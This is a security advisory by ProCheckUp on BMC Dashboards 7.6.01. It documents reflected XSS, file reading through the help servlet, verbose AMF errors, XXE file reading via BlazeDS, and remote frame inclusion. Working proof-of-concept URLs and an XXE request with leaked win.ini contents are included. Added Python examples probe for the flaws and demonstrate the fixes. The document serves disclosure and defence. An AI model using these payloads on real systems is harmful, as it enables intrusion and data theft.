BMC Dashboards 7.6.01 XSS / File Reading

2011-05-05T00:00:00
ID PACKETSTORM:101163
Type packetstorm
Reporter ProCheckUp
Modified 2011-05-05T00:00:00

Description

                                        
PR10-18: Multiple XSS (Cross Site Scripting) and arbitrary file reading  
flaws within BMC Dashboards by BMC  
  
Vulnerability found: 1st Oct 2010  
  
Vendor informed:  
  
Vulnerability fixed:  
  
Severity: High  
  
Description:  
  
BMC Dashboards provides service desk analysts with a dashboard view of  
aggregated performance indicators, enabling timely fact based decisions.  
ProCheckUp has discovered that multiple BMC Dashboards pages are  
vulnerable to reflected XSS attacks, that the help servlet discloses  
files from within the web root, and that the AMFX endpoint of the bundled  
Adobe BlazeDS is vulnerable to XML external entity injection, which  
allows arbitrary files to be read from outside the web root.  
  
Version: 7.6.01 - http://www.bmc.com/  
  
1) The following demonstrate the reflected XSS flaws:  
  
a)  
https://target-domain.foo/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm  
  
b)  
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>  
  
c) Multiple XSS within the demo pages  
https://target-domain.foo/bmc_help2u/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>  
  
https://target-domain.foo/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean  
  
d) XSS via the AMF remoting endpoint, which reflects the RemotingMessage  
operation name unfiltered in the faultString of its ErrorMessage.  
Non-printable bytes in the AMF request and response below are shown as  
dots. Note that the reply is served as application/x-amf, so a browser  
will not render it as HTML on its own; the unfiltered reflection is a  
finding in its own right, but reaching a victim's browser needs a route  
that gets the body interpreted as HTML.  
  
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1  
Content-Type: application/x-amf  
Host: target-domain.foo  
Content-Length: 462  
........null../58..... ..  
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation  
  
bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........  
#.  
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>  
..  
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.  
#. name.version..208Archive..1.0...  
.Cflex.messaging.io.ArrayCollection ..  
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade  
  
Response:  
HTTP/1.1 200 OK  
Date: Sat, 02 Oct 2010 00:15:35 GMT  
Server: Microsoft-IIS/6.0  
X-Powered-By: ASP.NET  
Content-Type: application/x-amf  
Content-Length: 4651  
  
......../58/onStatus.......  
.SIflex.messaging.messages.ErrorMessage.headers.rootCause  
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId  
..  
..acom.bmc.bsm.dashboards.util.logging.BSDException.message  
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System  
error. Contact your system administrator for assistance.  
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0  
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber  
  
codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage  
.  
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not  
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d  
  
Consequences:  
An attacker may be able to cause execution of malicious script in the  
browser of a user who clicks on a link to a BMC Dashboards site. Such  
code would run within the security context of the target domain. This  
type of attack can result in non-persistent defacement of the target  
site, or the redirection of confidential information (e.g. session IDs)  
to unauthorised third parties. No authentication is required to exploit  
this vulnerability.  
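A quick way to confirm the reflected XSS cases above on a system you are authorised to test, written here as an added example (it is not part of the advisory, nor code from ProCheckUp or BMC): each of the GET-based PoC URLs is issued with a random canary inside the script tag, and the response is classified by whether the tag came back intact, entity-encoded, or not at all. The `fake_server` is a constructed stand-in for the target that echoes the decoded request target into a 404 page, first verbatim (the behaviour reported in case a) and then HTML-escaped (the fix); `http_fetch` is the live transport, and it reads 4xx bodies because case (a) reflects into the 404 page itself.

```python
import html
import secrets
import urllib.error
import urllib.request
from urllib.parse import quote, unquote

# The GET-based targets from the advisory, with a {payload} slot for the script tag.
# The quote-and-angle-bracket prefixes of (b) and (c) are pre-encoded so the template is a valid URL.
ADVISORY_TARGETS = {
    "a) 404 page path": "https://target-domain.foo/bmc_help2u/help_services/html/xx/{payload}404.htm",
    "b) helpServlet2u msg": "https://target-domain.foo/bmc_help2u/servlet/helpServlet2u"
                            "?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg=%22%3E{payload}",
    "c) helpTest.jsp help": "https://target-domain.foo/bmc_help2u/help_services/demos/helpTest.jsp?help=%27%3E{payload}",
    "c) setChromeDef.jsp bFlag": "https://target-domain.foo/bmc_help2u/help_services/demos/setChromeDef.jsp"
                                 "?bFlag={payload}&submitVals=Call+setChromeDefBoolean",
}


def make_payload(canary: str) -> str:
    # A random canary instead of alert(1), so a cached or unrelated page cannot produce a false positive
    return f"<script>alert('{canary}')</script>"


def classify_reflection(body: str, payload: str, canary: str) -> str:
    """'raw' if the script tag came back intact, 'neutralised' if only the canary did
    (entity-encoded or with the tag stripped), 'absent' if the input was not reflected."""
    if canary not in body:
        return "absent"
    if payload in body:
        return "raw"
    return "neutralised"


def probe(url_template: str, fetch, canary: str = "") -> str:
    canary = canary or secrets.token_hex(4)
    payload = make_payload(canary)
    # Percent-encode the payload as a browser would before it travels in the URL
    url = url_template.format(payload=quote(payload, safe=""))
    return classify_reflection(fetch(url), payload, canary)


def probe_all(fetch) -> dict:
    return {name: probe(template, fetch) for name, template in ADVISORY_TARGETS.items()}


def http_fetch(url: str) -> str:
    """Live transport; 4xx bodies are returned too, since case (a) reflects into the 404 page."""
    try:
        with urllib.request.urlopen(url, timeout=15) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", errors="replace")


def fake_server(escape_output: bool):
    """Constructed stand-in for the target: an error page that echoes the decoded request
    target, verbatim (the reported behaviour) or HTML-entity-encoded (the fix)."""
    def fetch(url: str) -> str:
        target = unquote(url.split("target-domain.foo", 1)[1])
        shown = html.escape(target, quote=True) if escape_output else target
        return (f"<html><body><h1>HTTP Status 404</h1>"
                f"<p>The requested resource ({shown}) is not available.</p></body></html>")
    return fetch


if __name__ == "__main__":
    for name, verdict in probe_all(fake_server(escape_output=False)).items():
        print(f"{verdict:12} {name}")
```

Against the live system, pass `http_fetch` to `probe_all` instead of the fake. A `neutralised` verdict on the fixed server shows the canary still being echoed, which is fine as long as the surrounding quote and angle-bracket characters are encoded for the context they land in (HTML body for (a), attribute values for (b) and (c)).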
  
2) The help servlet is vulnerable to file (source code) reading, limited  
to the web root: the textareaWrap parameter names the file to return and  
is not confined to the help pages, so protected container files such as  
WEB-INF/web.xml can be retrieved.  
  
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml  
  
Consequences:  
File source code reading allows files within the web application to be  
retrieved from the target server, provided that their location is known.  
No authentication is required to exploit this vulnerability.  
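The confinement check that this parameter is missing, as an added example (not the servlet's own code, which is not on the page): `vulnerable_resolve` models the behaviour demonstrated above, where the parameter is mapped straight onto the context's document root, and `safe_resolve` decodes once, normalises, and then only accepts paths that stay inside one permitted subtree of that root. DOCROOT, CONTEXT_PATH and ALLOWED_SUBTREE are assumptions for the demo; in particular the choice of help_services as the only legitimate directory is inferred from the product's own links, not stated by the advisory.

```python
import posixpath
from urllib.parse import unquote

# Constructed deployment values; the real install location is not given on the page.
DOCROOT = "/opt/bmc/bmc_help2u"       # hypothetical directory the /bmc_help2u context serves from
CONTEXT_PATH = "/bmc_help2u"
ALLOWED_SUBTREE = "help_services"     # assumption: the only directory the help pages legitimately wrap


def vulnerable_resolve(textarea_wrap: str) -> str:
    """Model of the reported behaviour: the parameter is joined onto the document root
    with no check, so WEB-INF/web.xml (and anything else under the root) is served."""
    rel = textarea_wrap[len(CONTEXT_PATH):] if textarea_wrap.startswith(CONTEXT_PATH) else textarea_wrap
    return posixpath.join(DOCROOT, rel.lstrip("/"))


def safe_resolve(textarea_wrap: str):
    """Return the filesystem path to serve, or None if the request must be refused."""
    value = unquote(textarea_wrap)                      # decode exactly once
    # Backslashes, NULs, drive/stream separators and leftover percent-escapes (double
    # encoding) never occur in a legitimate help-page name, so refuse them outright
    if any(ch in value for ch in ("\\", "\x00", ":", "%")):
        return None
    if not value.startswith(CONTEXT_PATH + "/"):
        return None
    rel = posixpath.normpath(value[len(CONTEXT_PATH) + 1:])   # collapses ./ and ../ segments
    # Whatever survived normalisation must still live inside the permitted subtree; this
    # rejects "../..", "WEB-INF/..." and "help_services/../WEB-INF/..." alike
    if not rel.startswith(ALLOWED_SUBTREE + "/"):
        return None
    resolved = posixpath.join(DOCROOT, rel)
    if not resolved.startswith(DOCROOT + "/"):              # belt and braces
        return None
    return resolved


if __name__ == "__main__":
    for candidate in (
        "/bmc_help2u/help_services/demos/frameTst/my0a.jsp",
        "/bmc_help2u/WEB-INF/web.xml",
        "/bmc_help2u/help_services/../WEB-INF/web.xml",
        "/bmc_help2u/help_services/%2e%2e/%2e%2e/win.ini",
    ):
        print(f"{candidate!r:60} vulnerable={vulnerable_resolve(candidate)!r} safe={safe_resolve(candidate)!r}")
```

The single `unquote` mirrors what the servlet container already does to the query string; doing it twice is what opens the door to `%252e%252e` tricks, which is why a remaining `%` is refused rather than decoded again. Because the server on the page is Windows (IIS in the response headers), the check also refuses `:`, so alternate data streams and drive letters cannot be smuggled in.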
  
3) Verbose error pages when parsing malformed AMF messages: the  
ErrorMessage returned to an unauthenticated caller carries the server-side  
installation path and a full Java stack trace (shown below with the  
non-printable AMF bytes stripped).  
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1  
Host: target-domain.foo  
Content-Type: application/x-amf  
Content-Length: 462  
  
COflex.messaging.messages.RemotingMessagetimestampheadersoperation body  
sourceremotePasswordremoteUsernameparametersmessageIdtimeToLiveclientIddestination  
  
SIflex.messaging.messages.ErrorMessageheadersrootCause bodycorrelationIdfaultDetailfaultStringclientIdtimeToLivedestinationtimestampextendedDatafaultCodemessageId  
  
acom.bmc.bsm.dashboards.util.logging.BSDExceptionmessage guid!localizedMessagecauseargumentsprioritytracebackerrorCodecauseSummarySystem  
error. Contact your system administrator for assistance.  
Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifierAdZZZZZZZZJIiCvq53w9q0gerq4j8y0n80  
3;java.io.FileNotFoundException"$?cf:\Program Files\BMC  
Software\BMCDashboardsForBSM\BSMDashboards\archive\208Archive_1.025350<a>d026634a338.dar  
(The filename, directory name, or volume label syntax is  
incorrect):ERRORÇecom.bmc.bsm.dashboards.util.logging.BSDException: System  
error. Contact your system administrator for assistance.  
at  
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchiveHelper(DashboardArchiveFacadeImpl.java:585)  
at  
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchive(DashboardArchiveFacadeImpl.java:526)  
at  
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.getUndefinedDataSources(DashboardArchiveFacadeImpl.java:193)  
at sun.reflect.GeneratedMethodAccessor767.invoke(Unknown Source)  
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)  
at java.lang.reflect.Method.invoke(Unknown Source)  
at  
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl$1.run(TransactionInvocationHandlerImpl.java:66)  
at  
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:117)  
at  
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:107)  
at  
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl.invoke(TransactionInvocationHandlerImpl.java:60)  
at $Proxy54.getUndefinedDataSources(Unknown Source)  
  
  
4) Arbitrary file reading outside the web root through XML external  
entity (XXE) injection. The dashboards ship with Adobe BlazeDS, whose  
AMFX (XML-encoded AMF) channel resolves external entities declared in a  
DOCTYPE; this is the BlazeDS issue described at  
http://seclists.org/fulldisclosure/2010/Feb/383. The message below  
declares an entity pointing at ../win.ini (resolved on the server side),  
references it from a string field, and the file's contents come back in  
the response:  
  
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1  
  
Host: target-domain.foo  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10)  
Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0C)  
Content-type: application/x-amf  
  
POST DATA  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "../win.ini"> ]>  
<amfx ver="3"><body>  
<object type="flex.messaging.messages.CommandMessage">  
<traits>  
  
<string>body</string><string>clientId</string><string>correlationId</string>  
  
<string>destination</string><string>headers</string><string>messageId</string>  
  
<string>operation</string><string>timestamp</string><string>timeToLive</string>  
</traits><object><traits />  
</object>  
<null /><string /><string />  
<object>  
<traits>  
<string>DSId</string><string>DSMessagingVersion</string>  
</traits>  
<string>nil</string><int>1</int>  
</object>  
<string>&x3;</string>  
<int>5</int><int>0</int><int>0</int>  
</object>  
</body>  
</amfx>  
  
  
Response (contents of win.ini):  
; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1  
[MCI Extensions.BAK]  
aif=MPEGVideo  
aifc=MPEGVideo  
aiff=MPEGVideo  
asf=MPEGVideo  
asx=MPEGVideo  
au=MPEGVideo  
m1v=MPEGVideo  
m3u=MPEGVideo  
mp2=MPEGVideo  
mp2v=MPEGVideo  
mp3=MPEGVideo  
mpa=MPEGVideo  
mpe=MPEGVideo  
mpeg=MPEGVideo  
mpg=MPEGVideo  
mpv2=MPEGVideo  
snd=MPEGVideo  
wax=MPEGVideo  
wm=MPEGVideo  
wma=MPEGVideo  
wmv=MPEGVideo  
wmx=MPEGVideo  
wpl=MPEGVideo  
wvx=MPEGVideo  
  
Consequences:  
XML external entity injection allows files to be retrieved from the  
target server from outside the web root, provided that their location on  
the file system is known. Arbitrary file upload may also be possible,  
although it is not demonstrated here. No authentication is required to  
exploit this vulnerability.  
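The same exchange reproduced with Python's own SAX parser, as example code added here (it is not part of the advisory and not BMC's or Adobe's software): the AMFX CommandMessage above is parsed once with external general entities enabled, which is the behaviour the advisory reports for BlazeDS, and once with them disabled. The win.ini target is replaced by a constructed temporary file because the point is the entity resolution, not the file; the absolute path of that file and the Linux-style temp location are assumptions of the demo, and `has_dtd` is a hypothetical pre-parse gate of the kind a fix would place in front of the endpoint.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the win.ini read back on the page; it is written to a temporary
# file whose absolute path is declared as the entity's SYSTEM identifier.
SECRET_CONTENT = "; for 16-bit app support\n[fonts]\n[Mail]\nMAPI=1\n"

# The advisory's AMFX CommandMessage with the entity's SYSTEM id made substitutable.
AMFX_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "{sysid}"> ]>
<amfx ver="3"><body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
"""


class StringCollector(ContentHandler):
    """Record the text of every <string> element in document order; the last one is the
    field that carries the &x3; reference."""

    def __init__(self):
        super().__init__()
        self.strings = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "string":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "string":
            self.strings.append("".join(self._buf))
            self._buf = None


def parse_amfx(document: bytes, resolve_external_entities: bool) -> list:
    """Parse an AMFX body; the flag selects BlazeDS-like (vulnerable) or hardened behaviour.
    With the feature on, the SAX reader opens the SYSTEM id and splices the file's text in."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = StringCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return collector.strings


def has_dtd(document: bytes) -> bool:
    """Hypothetical pre-parse gate: AMFX never needs a DOCTYPE, so any body carrying one
    (or an entity declaration) can be refused before it reaches the XML parser."""
    return b"<!DOCTYPE" in document or b"<!ENTITY" in document


def run_demo() -> dict:
    with tempfile.NamedTemporaryFile("w", suffix=".ini", delete=False) as fh:
        fh.write(SECRET_CONTENT)
        secret_path = fh.name
    try:
        document = AMFX_TEMPLATE.format(sysid=secret_path).encode()
        return {
            "dtd_present": has_dtd(document),
            "leaked": parse_amfx(document, resolve_external_entities=True)[-1],
            "withheld": parse_amfx(document, resolve_external_entities=False)[-1],
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    result = run_demo()
    print("vulnerable parse returned:", repr(result["leaked"]))
    print("hardened parse returned:  ", repr(result["withheld"]))
```

The vulnerable parse hands back the whole file as the value of the `<string>` element, exactly the shape of the win.ini listing above; the hardened parse returns an empty string. On a Java stack the equivalent is to configure the XML parser with `http://apache.org/xml/features/disallow-doctype-decl` set to true (or, failing that, `http://xml.org/sax/features/external-general-entities` set to false); refusing any AMFX body that carries a DOCTYPE upstream, as `has_dtd` does, is a cheap complement that also stops entity-expansion denial of service.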
  
5) Application is vulnerable to remote frame inclusion: the URL parameter  
of index.htm is loaded into the page's frame without being checked  
against the application's own host.  
  
https://target-domain.foo/bmc_help2u/help_services/html/index.htm?&URL=http://www.procheckup.com  
  
Consequences:  
An attacker may be able to gain access to confidential data by carrying  
out a phishing attack: a link to the legitimate host loads  
attacker-controlled content inside the application's own pages.  
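A check for the URL parameter, as added example code (not ProCheckUp's or BMC's): the value is accepted only when it refers back into the application on its own host, and anything else falls back to a fixed page. APP_HOSTS and DEFAULT_PAGE are constructed values for the demo. The example is more general than the single PoC above, since it also covers the scheme-relative, `javascript:` and userinfo forms an attacker would try once the obvious absolute URL is blocked.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed values: the host the application is served from and the page to fall back to.
APP_HOSTS = {"target-domain.foo"}
DEFAULT_PAGE = "/bmc_help2u/help_services/html/index.htm"   # hypothetical safe default


def safe_frame_target(url_param: str) -> str:
    """Return a same-origin relative reference for the frame, or DEFAULT_PAGE."""
    value = url_param.strip()
    # Browsers treat backslashes as slashes and strip control characters, so a value
    # containing either cannot be reasoned about reliably; refuse it
    if "\\" in value or any(ord(ch) < 0x20 for ch in value):
        return DEFAULT_PAGE
    parts = urlsplit(value)
    if parts.scheme:
        # Absolute URL: only http(s) back to the application's own host is acceptable
        # (hostname is lower-cased and excludes any user:pass@ prefix an attacker adds)
        if parts.scheme not in ("http", "https") or parts.hostname not in APP_HOSTS:
            return DEFAULT_PAGE
    elif parts.netloc:
        # Scheme-relative //evil.example inherits https: and leaves the site
        return DEFAULT_PAGE
    # A path that is empty, relative, or starts with // (which urlsplit leaves in the path
    # when there is no netloc) must not reach the frame either
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return DEFAULT_PAGE
    # Re-emit without scheme or host, so the frame can only ever load from this origin
    return urlunsplit(("", "", parts.path, parts.query, ""))


if __name__ == "__main__":
    for candidate in ("http://www.procheckup.com", "//www.procheckup.com/",
                      "javascript:alert(1)", "/bmc_help2u/help_services/html/help.htm?topic=1"):
        print(f"{candidate!r:50} -> {safe_frame_target(candidate)!r}")
```

Returning a relative reference even for an allowed absolute URL removes the scheme and host from the output entirely, so a mistake in the host comparison cannot turn into an off-site frame; the fragment is dropped because the frame does not need it and it is where a second payload would otherwise ride along.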
  
Fix:  
  
References:  
http://www.procheckup.com/Vulnerabilities.php  
  
Credits: Richard Brain and Jan Fry of ProCheckUp Ltd (www.procheckup.com)  
  
Legal:  
Copyright 2010 Procheckup Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the  
Internet community for the purpose of alerting them to problems, if and  
only if, the Bulletin is not edited or changed in any way, is attributed  
to Procheckup, and provided such reproduction and/or distribution is  
performed for non-commercial purposes.  
  
Any other use of this information is prohibited. Procheckup is not  
liable for any misuse of this information by any third party.  
  
  